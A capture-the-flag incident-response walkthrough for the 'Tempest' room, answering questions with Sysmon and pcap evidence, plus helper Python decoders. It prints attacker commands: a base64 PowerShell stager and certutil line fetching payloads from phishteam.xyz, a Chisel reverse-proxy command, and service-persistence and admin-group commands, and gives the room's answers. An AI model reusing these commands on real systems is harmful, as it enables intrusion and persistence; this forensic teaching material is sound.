Tempest - Medium
- Preparation - Log Analysis
- Preparation - Tools and Artifacts
- Initial Access - Malicious Document
- Initial Access - Stage 2 execution
- Initial Access - Malicious Document Traffic
- Discovery - Internal Reconnaissance
- Privilege Escalation - Exploiting Privileges
- Actions on Objective - Fully-owned Machine
Preparation - Log Analysis
- Log analysis: understanding the events a system generates in order to identify anomalies (security threats, bugs, etc.) that may impact the organisation; the log files and their individual entries are the raw material for this analysis.
- Event correlation: identifying significant relationships between entries drawn from multiple log sources.
Preparation - Tools and Artifacts
cd '.\Desktop\Incident Files\'
ls
Get-FileHash -Algorithm SHA256 .\capture.pcapng
Get-FileHash -Algorithm SHA256 .\sysmon.evtx
Get-FileHash -Algorithm SHA256 .\windows.evtx
1. What is the SHA256 hash of the capture.pcapng file? - CB3A1E6ACFB246F256FBFEFDB6F494941AA30A5A7C3F5258C3E63CFA27A23DC6
2. What is the SHA256 hash of the sysmon.evtx file? - 665DC3519C2C235188201B5A8594FEA205C3BCBC75193363B87D2837ACA3C91F
3. What is the SHA256 hash of the windows.evtx file? - D0279D5292BC5B25595115032820C978838678F4333B725998CFE9253E186D60
Initial Access - Malicious Document
cd C:\Tools\EvtxECmd
#to parse provided logs, convert evtx to csv
.\EvtxECmd.exe -f 'C:\Users\user\Desktop\Incident Files\sysmon.evtx' --csv 'C:\Users\user\Desktop\Incident Files' --csvf sysmon.csv
#csv saved in Incident Files folder
#we can use Timeline explorer to load exported csv
- We are given that the malicious document has a .doc extension, that it was downloaded via chrome.exe, and that it was then used to gain code execution.
- After converting the .evtx to .csv with EvtxECmd, we can load the CSV into Timeline Explorer via File > Open > sysmon.csv.
- To view the Sysmon logs in SysmonView, first open sysmon.evtx in Event Viewer and save (export) it as an XML file; that XML can then be opened in SysmonView.
- In Timeline Explorer, searching for '.doc' gives us the name of the malicious document; the same rows show the compromised user and machine in the 'User Name' column.
- Scrolling through the log entries, the ones with PID 496 belong to the Microsoft Word process (winword.exe) that opened the document.
- We can narrow these down with the filter 'ProcessID: 496'; the IP address is in these entries. Sysmon logs DNS lookups as Event ID 22 (DnsQuery), whose QueryName and QueryResults fields hold the domain and the address it resolved to.
- Searching for 'base64' gives us the complete payload; decoding it in CyberChef ('From Base64') shows the command to be executed: a PowerShell one-liner that changes into the user's Startup folder ($app is the ApplicationData folder), downloads http://phishteam.xyz/02dcf07/update.zip with iwr, expands it there and deletes the archive.
- Googling "winword.exe cve" brings up the CVE in the first few results: CVE-2022-30190 (Follina), the MSDT remote code execution flaw triggered from Office documents.
1. The user of this machine was compromised by a malicious document. What is the file name of the document? - free_magicules.doc
2. What is the name of the compromised user and machine? - benimaru-TEMPEST
3. What is the PID of the Microsoft Word process that opened the malicious document? - 496
4. Based on Sysmon logs, what is the IPv4 address resolved by the malicious domain used in the previous question? - 167.71.199.191
5. What is the base64 encoded string in the malicious payload executed by the document? - JGFwcD1bRW52aXJvbm1lbnRdOjpHZXRGb2xkZXJQYXRoKCdBcHBsaWNhdGlvbkRhdGEnKTtjZCAiJGFwcFxNaWNyb3NvZnRcV2luZG93c1xTdGFydCBNZW51XFByb2dyYW1zXFN0YXJ0dXAiOyBpd3IgaHR0cDovL3BoaXNodGVhbS54eXovMDJkY2YwNy91cGRhdGUuemlwIC1vdXRmaWxlIHVwZGF0ZS56aXA7IEV4cGFuZC1BcmNoaXZlIC5cdXBkYXRlLnppcCAtRGVzdGluYXRpb25QYXRoIC47IHJtIHVwZGF0ZS56aXA7Cg==
6. What is the CVE number of the exploit used by the attacker to achieve a remote code execution? - CVE-2022-30190
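The steps above (filter the Sysmon Event ID 1 rows under Word's PID, pull out the base64 blob, decode it) can be scripted instead of done row by row in Timeline Explorer. The Python below is an added example written for this page, not code from the original walkthrough or from any tool it mentions. It runs over constructed rows in a simplified EvtxECmd-like layout, so the column names, every PID except Word's 496, the msdt.exe hop and the child command lines are assumptions; the base64 payload is the one quoted in question 5. It walks the whole process tree under PID 496 rather than only direct children, and handles both plain UTF-8 blobs and the UTF-16LE encoding that PowerShell's -EncodedCommand takes.

```python
import base64
import binascii
import csv
import re

# Constructed sample in a simplified EvtxECmd-like layout; the column names, every
# PID except Word's 496 and the child command lines are assumptions, not the
# incident's real sysmon.csv. The blob in the first PowerShell child is the payload
# quoted on this page; the second child carries a UTF-16LE blob of the kind
# PowerShell's -EncodedCommand takes, built here so the decoder meets both cases.
PAGE_PAYLOAD_B64 = "JGFwcD1bRW52aXJvbm1lbnRdOjpHZXRGb2xkZXJQYXRoKCdBcHBsaWNhdGlvbkRhdGEnKTtjZCAiJGFwcFxNaWNyb3NvZnRcV2luZG93c1xTdGFydCBNZW51XFByb2dyYW1zXFN0YXJ0dXAiOyBpd3IgaHR0cDovL3BoaXNodGVhbS54eXovMDJkY2YwNy91cGRhdGUuemlwIC1vdXRmaWxlIHVwZGF0ZS56aXA7IEV4cGFuZC1BcmNoaXZlIC5cdXBkYXRlLnppcCAtRGVzdGluYXRpb25QYXRoIC47IHJtIHVwZGF0ZS56aXA7Cg=="
ENC_COMMAND_B64 = base64.b64encode("net user shion /add".encode("utf-16le")).decode()

SAMPLE_ROWS = [
    {"EventId": "1", "ProcessId": "496", "ParentProcessId": "4012",
     "Image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "CommandLine": r'"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE" /n '
                    r'"C:\Users\benimaru\Downloads\free_magicules.doc"'},
    {"EventId": "1", "ProcessId": "3188", "ParentProcessId": "496",
     "Image": r"C:\Windows\System32\msdt.exe", "CommandLine": r"C:\Windows\System32\msdt.exe"},
    {"EventId": "1", "ProcessId": "1876", "ParentProcessId": "3188",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -w hidden -c [Text.Encoding]::UTF8.GetString("
                    "[Convert]::FromBase64String('" + PAGE_PAYLOAD_B64 + "'))"},
    {"EventId": "1", "ProcessId": "2044", "ParentProcessId": "496",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -noni -enc " + ENC_COMMAND_B64},
    {"EventId": "3", "ProcessId": "496", "ParentProcessId": "",
     "Image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE", "CommandLine": ""},
]

# Runs of base64 alphabet long enough to be a command; SHA256 hex strings match
# this too, which is why decode_blob() also insists on a decodable, printable result.
B64_RE = re.compile(r"[A-Za-z0-9+/]{32,}={0,2}")
URL_RE = re.compile(r"""https?://[^\s'";]+""")


def load_evtxecmd_csv(path):
    """Read a real EvtxECmd export; the tool writes UTF-8 with a BOM."""
    with open(path, newline="", encoding="utf-8-sig") as fh:
        return list(csv.DictReader(fh))


def descendants(rows, root_pid):
    """Event ID 1 rows for every process under root_pid (children, grandchildren, ...).
    Windows reuses PIDs, so on a long log also constrain the rows by time."""
    by_parent = {}
    for r in rows:
        if r["EventId"] == "1":
            by_parent.setdefault(r["ParentProcessId"], []).append(r)
    found, queue = [], [str(root_pid)]
    while queue:
        pid = queue.pop(0)
        for r in by_parent.get(pid, []):
            found.append(r)
            queue.append(r["ProcessId"])
    return found


def decode_blob(blob):
    """Base64 -> text, or None when the run is not really an encoded command."""
    try:
        raw = base64.b64decode(blob, validate=True)
    except (binascii.Error, ValueError):
        return None
    # NUL bytes survive a UTF-8 decode, so an -EncodedCommand (UTF-16LE) payload
    # would otherwise come back as 'n\x00e\x00t\x00...'; pick the codec by that sign.
    try:
        text = raw.decode("utf-16le") if b"\x00" in raw else raw.decode("utf-8")
    except UnicodeDecodeError:
        return None
    return text if all(c.isprintable() or c in "\r\n\t" for c in text) else None


def encoded_commands(rows, root_pid):
    """(image, decoded command) for every base64 blob in the tree under root_pid."""
    out = []
    for r in descendants(rows, root_pid):
        for m in B64_RE.finditer(r["CommandLine"]):
            text = decode_blob(m.group(0))
            if text:
                out.append((r["Image"], text))
    return out


def stage_urls(decoded):
    """URLs a decoded stager reaches out to (the next thing to pivot on in the pcap)."""
    return URL_RE.findall(decoded)


if __name__ == "__main__":
    for image, cmd in encoded_commands(SAMPLE_ROWS, 496):
        print(image, "->", cmd.strip(), stage_urls(cmd))
```

Point load_evtxecmd_csv() at the real sysmon.csv export to run the same logic over the incident data; the URLs returned by stage_urls() are the hosts to search for in Brim in the traffic section.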
Initial Access - Stage 2 execution
- From the decoded base64 command found earlier we get the target path of the payload: $app is [Environment]::GetFolderPath('ApplicationData'), i.e. %APPDATA%, which for this user is C:\Users\benimaru\AppData\Roaming, and the script changes into the Startup folder beneath it before downloading update.zip.
- After the log entry for the 'update.zip' command, scroll down until a Logon event appears; a little further down a malicious command is executed.
- That command runs the binary payload 'first.exe'; searching for that name, its SHA256 hash is in the 'PayloadData3' column (the Hashes field of the Sysmon Event ID 1 entry).
- The same entries give us the domain name 'resolvecyber.xyz'; viewing the 'Payload' column of the network connection entry (Sysmon Event ID 3) shows the destination port as well.
1. The malicious execution of the payload wrote a file on the system. What is the full target path of the payload? - C:\Users\benimaru\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
2. The implanted payload executes once the user logs into the machine. What is the executed command upon a successful login of the compromised user? - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -w hidden -noni certutil -urlcache -split -f 'http://phishteam.xyz/02dcf07/first.exe' C:\Users\Public\Downloads\first.exe; C:\Users\Public\Downloads\first.exe
3. Based on Sysmon logs, what is the SHA256 hash of the malicious binary downloaded for stage 2 execution? - CE278CA242AA2023A4FE04067B0A32FBD3CA1599746C160949868FFC7FC3D7D8
4. The stage 2 payload downloaded establishes a connection to a c2 server. What is the domain and port used by the attacker? - resolvecyber.xyz:80
Initial Access - Malicious Document Traffic
- Now that we have the malicious domains, we can use Brim and Wireshark to find the related network events in capture.pcapng.
- From the Sysmon logs we have two malicious domains, phishteam.xyz and resolvecyber.xyz; both can be used as search terms.
- In Brim, the embedded URL comes from the search query:
_path=="http" "phishteam.xyz"
- In Wireshark, filter on the http protocol and use 'Follow > HTTP Stream' on the request to read the page source.
- Looking through the remaining http packets in Wireshark shows the URL the c2 binary polls for commands, the parameter it uses to return command output, the HTTP method, and the User-Agent header that identifies the client library.
1. What is the URL of the malicious payload embedded in the document? - http://phishteam.xyz/02dcf07/index.html
2. What is the encoding used by the attacker on the c2 connection? - base64
3. The malicious c2 binary sends a payload using a parameter that contains the executed command results. What is the parameter used by the binary? - q
4. The malicious c2 binary connects to a specific URL to get the command to be executed. What is the URL used by the binary? - /9ab62b5
5. What is the HTTP method used by the binary? - GET
6. Based on the user agent, what programming language was used by the attacker to compile the binary? - nim (the User-Agent is 'Nim httpclient/<version>', the default set by Nim's httpclient module)
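As an added example (not code from the original walkthrough or from Brim, Zeek or Wireshark), the following Python reproduces the findings above over a constructed Zeek-style http log: it filters by host, splits the URI into path and query, base64-decodes the q parameter and classifies the User-Agent. The hosts, paths, the parameter name and the Nim User-Agent follow this page; the timestamps, the Nim version string and the content of each command result are assumptions. The two things that break naive decoding of base64 carried in a query string, the '+' that parse_qs turns into a space and padding an implant may have stripped, are handled in decode_param().

```python
import base64
import binascii
import json
from urllib.parse import parse_qs, urlsplit


def _b64(text):
    return base64.b64encode(text.encode()).decode()


# Constructed Zeek-style http records, reduced to a few http.log fields and written
# as the JSON lines Brim ingests. Hosts, paths, the q parameter and the Nim
# User-Agent follow this page; the timestamps, the Nim version and the content of
# each command result are assumptions, not data from capture.pcapng.
SAMPLE_HTTP_LOG = "\n".join(json.dumps(r) for r in [
    {"ts": 1655201000.0, "id.resp_p": 80, "method": "GET", "host": "phishteam.xyz",
     "uri": "/02dcf07/index.html",
     "user_agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Chrome/102.0.0.0"},
    {"ts": 1655201020.0, "id.resp_p": 80, "method": "GET", "host": "resolvecyber.xyz",
     "uri": "/9ab62b5", "user_agent": "Nim httpclient/1.6.6"},
    {"ts": 1655201021.0, "id.resp_p": 80, "method": "GET", "host": "resolvecyber.xyz",
     "uri": "/9ab62b5?q=" + _b64("whoami\r\ntempest\\benimaru\r\n"),
     "user_agent": "Nim httpclient/1.6.6"},
    {"ts": 1655205000.0, "id.resp_p": 8080, "method": "GET", "host": "resolvecyber.xyz",
     "uri": "/9ab62b5?q=" + _b64("whoami\r\nnt authority\\system\r\n"),
     "user_agent": "Nim httpclient/1.6.6"},
])

# Default User-Agent prefixes of common HTTP client libraries; the implant on this
# page identified itself with the first one.
UA_FAMILIES = {
    "Nim httpclient/": "nim",
    "python-requests/": "python",
    "Go-http-client/": "go",
    "curl/": "curl",
}


def ua_family(user_agent):
    for prefix, family in UA_FAMILIES.items():
        if user_agent.startswith(prefix):
            return family
    return "browser/other"


def parse_http_log(text):
    """One dict per JSON line; extra Zeek fields are carried along untouched."""
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def decode_param(value):
    """Base64 from a query-string value -> text, or None if it does not decode."""
    # parse_qs has already undone %-escapes and turned '+' into ' '; base64 has no
    # spaces, so put the '+' back, then repair padding the client may have dropped.
    value = value.strip().replace(" ", "+")
    value += "=" * (-len(value) % 4)
    try:
        return base64.b64decode(value, validate=True).decode("utf-8", errors="replace")
    except (binascii.Error, ValueError):
        return None


def c2_transactions(records, c2_host):
    """Every request to c2_host, with the path, parameter names, client family and
    the decoded command output carried in q (one per beacon)."""
    out = []
    for r in records:
        if r.get("host") != c2_host:
            continue
        parts = urlsplit(r["uri"])
        params = parse_qs(parts.query, keep_blank_values=True)
        out.append({
            "ts": r["ts"],
            "port": r["id.resp_p"],
            "method": r["method"],
            "path": parts.path,
            "params": sorted(params),
            "ua_family": ua_family(r.get("user_agent", "")),
            "results": [decode_param(v) for v in params.get("q", [])],
        })
    return out


if __name__ == "__main__":
    for tx in c2_transactions(parse_http_log(SAMPLE_HTTP_LOG), "resolvecyber.xyz"):
        print(tx["ts"], tx["port"], tx["method"], tx["path"], tx["params"], tx["ua_family"])
        for result in tx["results"]:
            print("   ", repr(result))
```

Zeek writes http.log in this JSON form when run with LogAscii::use_json=T (the real records carry many more fields, which parse_http_log() simply keeps); the same decoding applied to the port 8080 traffic gives the commands run after privilege escalation.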
Discovery - Internal Reconnaissance
- We can use the following queries in Brim to narrow down entries:
_path=="http" "phishteam.xyz" id.resp_p==80 | cut ts, host, id.resp_p, uri | sort ts
_path=="http" "resolvecyber.xyz" id.resp_p==80 | cut ts, host, id.resp_p, uri | sort ts
- The second query returns the base64-encoded strings in the c2 traffic; decoding them gives the commands executed and their output.
- For further inspection, switch back to Timeline Explorer and view the Sysmon logs.
- The decoded strings show that the file 'ch.exe' was downloaded; searching for it in the Sysmon logs gives the command the attacker used to establish the reverse SOCKS proxy.
- The SHA256 hash can be searched on VirusTotal for more context.
- After 'ch.exe', the next process is 'wsmprovhost.exe' (the WinRM provider host), which tells us which service the attacker used.
1. The attacker was able to discover a sensitive file inside the machine of the user. What is the password discovered on the aforementioned file? - infernotempest
2. The attacker then enumerated the list of listening ports inside the machine. What is the listening port that could provide a remote shell inside the machine? - 5985
3. The attacker then established a reverse socks proxy to access the internal services hosted inside the machine. What is the command executed by the attacker to establish the connection? - C:\Users\benimaru\Downloads\ch.exe client 167.71.199.191:8080 R:socks
4. What is the SHA256 hash of the binary used by the attacker to establish the reverse socks proxy connection? - 8A99353662CCAE117D2BB22EFD8C43D7169060450BE413AF763E8AD7522D2451
5. What is the name of the tool used by the attacker based on the SHA256 hash? - Chisel
6. The attacker then used the harvested credentials from the machine. Based on the succeeding process after the execution of the socks proxy, what service did the attacker use to authenticate? - WinRM (wsmprovhost.exe is the WinRM provider host that services remote PowerShell sessions on TCP 5985)
Privilege Escalation - Exploiting Privileges
- After 'wsmprovhost.exe', scrolling down shows the next binary downloaded, 'spf.exe'; we can confirm this with the search term 'iwr' (Invoke-WebRequest).
- To get its SHA256 hash, search for 'spf.exe'; the hash is in the 'PayloadData3' column.
- We can use VirusTotal to review the hash. PrintSpoofer abuses SeImpersonatePrivilege, a privilege service accounts commonly hold, by coercing the print spooler into connecting to an attacker-controlled named pipe and impersonating the resulting SYSTEM token.
1. After discovering the privileges of the current user, the attacker then downloaded another binary to be used for privilege escalation. What is the name and the SHA256 hash of the binary? - spf.exe,8524FBC0D73E711E69D60C64F1F1B7BEF35C986705880643DD4D5E17779E586D
2. Based on the SHA256 hash of the binary, what is the name of the tool used? - PrintSpoofer
3. The tool exploits a specific privilege owned by the user. What is the name of the privilege? - SeImpersonatePrivilege
4. Then, the attacker executed the tool with another binary to establish a c2 connection. What is the name of the binary? - final.exe
5. The binary connects to a different port from the first c2 connection. What is the port used? - 8080
Actions on Objective - Fully-owned Machine
- In Brim, we can use the following search query:
_path=="http" "resolvecyber.xyz" id.resp_p==8080 | cut ts, host, id.resp_p, uri | sort ts
- Based on the results, decode the base64 strings to get the executed commands.
- The command executed for persistence can be found in Timeline Explorer immediately after the addition of 'shion' to the local Administrators group.
1. Upon achieving SYSTEM access, the attacker then created two users. What are the account names? - shion,shuna
2. Prior to the successful creation of the accounts, the attacker executed commands that failed in the creation attempt. What is the missing option that made the attempt fail? - /add
3. Based on windows event logs, the accounts were successfully created. What is the event ID that indicates the account creation activity? - 4720
4. The attacker added one of the accounts in the local administrator's group. What is the command used by the attacker? - net localgroup administrators /add shion
5. Based on windows event logs, the account was successfully added to a sensitive group. What is the event ID that indicates the addition to a sensitive local group? - 4732
6. After the account creation, the attacker executed a technique to establish persistent administrative access. What is the command executed by the attacker to achieve this? - C:\Windows\system32\sc.exe \\TEMPEST create TempestUpdate2 binpath= C:\ProgramData\final.exe start= auto
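The Windows event log questions above (4720 for account creation, 4732 for the addition to a local group) can be answered with a short script over the XML that Event Viewer exports, the same export step used earlier for SysmonView. The Python below is an added example, not part of the original walkthrough; its events are constructed to match this page's account names and group, while the timestamps, SIDs and SubjectUserName are assumptions. The point worth taking away is the join key: 4732 normally records MemberName as '-', so the created account has to be matched to the group addition by SID, not by name.

```python
import xml.etree.ElementTree as ET

NS = {"e": "http://schemas.microsoft.com/win/2004/08/events/event"}


def _event(event_id, time, data):
    """Build one <Event> in the shape Event Viewer writes with 'Save As... XML'."""
    fields = "".join(f'<Data Name="{k}">{v}</Data>' for k, v in data.items())
    return (f'<Event xmlns="{NS["e"]}"><System>'
            '<Provider Name="Microsoft-Windows-Security-Auditing"/>'
            f'<EventID>{event_id}</EventID><TimeCreated SystemTime="{time}"/>'
            '<Computer>TEMPEST</Computer></System>'
            f'<EventData>{fields}</EventData></Event>')


# Constructed Security-log events; account names, group and event IDs follow this
# page, while the timestamps, SIDs and SubjectUserName (the computer account, which
# is how SYSTEM appears) are assumptions, not values from the incident's windows.evtx.
SHION_SID = "S-1-5-21-1111111111-2222222222-3333333333-1001"
SHUNA_SID = "S-1-5-21-1111111111-2222222222-3333333333-1002"
SAMPLE_EVENTS_XML = "<Events>" + "".join([
    _event(4720, "2022-06-21T03:16:40.000Z", {
        "TargetUserName": "shion", "TargetDomainName": "TEMPEST",
        "TargetSid": SHION_SID, "SubjectUserName": "TEMPEST$"}),
    _event(4720, "2022-06-21T03:16:55.000Z", {
        "TargetUserName": "shuna", "TargetDomainName": "TEMPEST",
        "TargetSid": SHUNA_SID, "SubjectUserName": "TEMPEST$"}),
    # 4732 identifies the member by SID; MemberName is usually just '-'.
    # S-1-5-32-544 is the well-known SID of the local Administrators group.
    _event(4732, "2022-06-21T03:17:10.000Z", {
        "MemberName": "-", "MemberSid": SHION_SID,
        "TargetUserName": "Administrators", "TargetDomainName": "Builtin",
        "TargetSid": "S-1-5-32-544", "SubjectUserName": "TEMPEST$"}),
]) + "</Events>"


def parse_events(xml_text):
    """Flatten each <Event> into event_id, time, computer and its EventData fields."""
    root = ET.fromstring(xml_text)
    events = []
    for ev in root.findall("e:Event", NS):
        system = ev.find("e:System", NS)
        data = {d.get("Name"): (d.text or "") for d in ev.findall("e:EventData/e:Data", NS)}
        events.append({
            "event_id": int(system.find("e:EventID", NS).text),
            "time": system.find("e:TimeCreated", NS).get("SystemTime"),
            "computer": system.find("e:Computer", NS).text,
            "data": data,
        })
    return sorted(events, key=lambda e: e["time"])


def account_timeline(events):
    """Per SID: when the account was created (4720), by whom, and which local
    groups it was added to (4732). The SID is the join key between the two."""
    accounts = {}
    for ev in events:
        d = ev["data"]
        if ev["event_id"] == 4720:
            accounts[d["TargetSid"]] = {
                "name": d["TargetUserName"], "created": ev["time"],
                "created_by": d["SubjectUserName"], "groups": []}
        elif ev["event_id"] == 4732:
            acct = accounts.setdefault(d["MemberSid"], {
                "name": d.get("MemberName", "-"), "created": None,
                "created_by": None, "groups": []})
            acct["groups"].append(d["TargetUserName"])
    return accounts


def privileged_new_accounts(events, sensitive=("Administrators",)):
    """Names of accounts created in this log that then landed in a sensitive group."""
    return sorted(a["name"] for a in account_timeline(events).values()
                  if a["created"] and set(a["groups"]) & set(sensitive))


if __name__ == "__main__":
    timeline = account_timeline(parse_events(SAMPLE_EVENTS_XML))
    for sid, acct in timeline.items():
        print(sid, acct)
    print("new privileged accounts:", privileged_new_accounts(parse_events(SAMPLE_EVENTS_XML)))
```

Export the Security log from Event Viewer with "Save All Events As..." in XML format and pass the file contents to parse_events(); a 4732 whose MemberSid has no matching 4720 in the same export is a pre-existing account being promoted, which account_timeline() keeps with created set to None.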